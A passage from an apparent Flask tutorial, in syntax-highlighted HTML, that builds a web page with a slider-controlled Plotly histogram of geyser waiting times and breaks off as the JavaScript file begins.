&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;meta&lt;/span&gt; name&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;viewport&amp;#34;&lt;/span&gt; content&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;width=device-width, initial-scale=1.0&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;&amp;lt;!-- additional deps --&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;script&lt;/span&gt; src&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://code.jquery.com/jquery-3.4.1.min.js&amp;#34;&lt;/span&gt; integrity&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=&amp;#34;&lt;/span&gt; crossorigin&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;anonymous&amp;#34;&lt;/span&gt;&amp;gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;script&lt;/span&gt; src&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js&amp;#34;&lt;/span&gt; integrity&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sha384-Q6E9RHvbIyZFJoft+2mJbHaEWldlvI9IOYy5n3zV9zzTtmI3UksdQRVvoxMfooAo&amp;#34;&lt;/span&gt; crossorigin&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;anonymous&amp;#34;&lt;/span&gt;&amp;gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;&amp;lt;!-- bootstrap --&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;link&lt;/span&gt; rel&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;stylesheet&amp;#34;&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css&amp;#34;&lt;/span&gt; integrity&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh&amp;#34;&lt;/span&gt; crossorigin&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;anonymous&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;script&lt;/span&gt; src&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js&amp;#34;&lt;/span&gt; integrity&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sha384-wfSDF2E50Y2D1uUdj0O3uMBJnjuUD4Ih7YwaYd1iqfktj0Uod8GCExl3Og8ifwB6&amp;#34;&lt;/span&gt; crossorigin&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;anonymous&amp;#34;&lt;/span&gt;&amp;gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;&amp;lt;!-- ion range slider --&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;&amp;lt;!--Plugin CSS file with desired skin--&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;link&lt;/span&gt; rel&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;stylesheet&amp;#34;&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://cdnjs.cloudflare.com/ajax/libs/ion-rangeslider/2.3.0/css/ion.rangeSlider.min.css&amp;#34;&lt;/span&gt;/&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;&amp;lt;!-- JS --&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;script&lt;/span&gt; src&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://cdnjs.cloudflare.com/ajax/libs/ion-rangeslider/2.3.0/js/ion.rangeSlider.min.js&amp;#34;&lt;/span&gt;&amp;gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;&amp;lt;!-- Plotly --&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;script&lt;/span&gt; src&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://cdn.plot.ly/plotly-latest.min.js&amp;#34;&lt;/span&gt;&amp;gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;title&lt;/span&gt;&amp;gt;Hello Flask&amp;lt;/&lt;span style="color:#7ee787"&gt;title&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;&amp;lt;!-- Our stylesheet --&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;link&lt;/span&gt; rel&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;stylesheet&amp;#34;&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;{{url_for(&amp;#39;static&amp;#39;, filename=&amp;#39;css/app.css&amp;#39;)}}&amp;#34;&lt;/span&gt;&amp;gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&amp;lt;!-- --&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;head&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;{{}}&lt;/code&gt; notation at the bottom here is jinja syntax. Flask makes use of jinja templating for creating web pages that your users will consume. &lt;code&gt;url_for&lt;/code&gt; is a function that is automatically available when you render a template using flask, used to generate URLs to views instead of having to write them out manually. &lt;a href="https://jinja.palletsprojects.com/" rel="external"&gt;Jinja templating&lt;/a&gt; is a really neat way to blend raw markup with your python variables and functions and some logic statements like for loops. We haven’t written any style yet, but we will create the file ready for later, we will also create somewhere to contain our JavaScript&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mkdir -p static/&lt;span style="color:#ff7b72;font-weight:bold"&gt;{&lt;/span&gt;css,js&lt;span style="color:#ff7b72;font-weight:bold"&gt;}&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; touch static/css/app.css static/js/hist.js
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With all of dependencies in place it is relatively easy to create a simple layout. We have a 1/3 to 2/3 layout of two columns for controls and main content respectively, somewhere to contain our input elements and an empty container for our histogram to begin with. The &lt;code&gt;&amp;lt;body&amp;gt;&lt;/code&gt; of our &lt;code&gt;index.html&lt;/code&gt; then is&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&amp;lt;!-- index.html --&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;body&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;container&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;row&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;col-3&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;title&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Hello Flask!
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;form&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;well&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;label&lt;/span&gt; for&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;bins&amp;#34;&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;control-label&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Bins
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;label&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;input&lt;/span&gt; type&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;bins&amp;#34;&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;js-range-slider&amp;#34;&lt;/span&gt; value&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;form&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;col-9&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;chart&amp;#34;&lt;/span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;histogram&amp;#39;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;script&lt;/span&gt; src&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;{{url_for(&amp;#39;static&amp;#39;, filename=&amp;#39;js/hist.js&amp;#39;)}}&amp;#34;&lt;/span&gt;&amp;gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;body&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We will go back to our &lt;code&gt;app.py&lt;/code&gt; and add the route for this view&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@app.route&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#39;/&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;home&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; render_template(&lt;span style="color:#a5d6ff"&gt;&amp;#39;index.html&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Our full &lt;code&gt;app.py&lt;/code&gt; is then&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# app.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;flask&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Flask, render_template, request
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; read_csv
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plotly.express&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plotly.utils&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; PlotlyJSONEncoder
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;json&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;numpy&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;np&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;faithful &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; read_csv(&lt;span style="color:#a5d6ff"&gt;&amp;#39;./data/faithful.csv&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Flask(&lt;span style="color:#79c0ff"&gt;__name__&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@app.route&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#39;/graph&amp;#39;&lt;/span&gt;, methods&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[&lt;span style="color:#a5d6ff"&gt;&amp;#39;GET&amp;#39;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;hist&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# calculate the bins&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; faithful[&lt;span style="color:#a5d6ff"&gt;&amp;#39;waiting&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; counts, bins &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;histogram(x, bins&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;linspace(np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;min(x), np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;max(x), int(request&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;args[&lt;span style="color:#a5d6ff"&gt;&amp;#39;bins&amp;#39;&lt;/span&gt;])&lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bins &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; (bins[:&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; bins[&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;:])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; p &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; px&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;bar(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;bins, y&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;counts,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Histogram of waiting times&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; labels&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;x&amp;#39;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#39;Waiting time to next eruption (in mins)&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;y&amp;#39;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#39;Frequency&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; template&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;simple_white&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; json&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;dumps(p, cls&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;PlotlyJSONEncoder)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@app.route&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#39;/&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;home&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; render_template(&lt;span style="color:#a5d6ff"&gt;&amp;#39;index.html&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;__name__&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;__main__&amp;#39;&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;run()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Running the server and viewing our work still won’t look very impressive, but we are almost there. At the end of our page we are including a JavaScript file, this is to initialise our ion range slider and use it to send the chosen value from client to server to ask for the updated plot.&lt;/p&gt;
&lt;p&gt;We can use AJAX (Asynchronous JavaScript and XML) to send the data from the slider to our &lt;code&gt;/graph&lt;/code&gt; URL route, and on response, draw a new plotly plot into the div element with the &lt;code&gt;histogram&lt;/code&gt; id. We want this function to run when we first load the page and every time a user moves the slider&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// hist.js
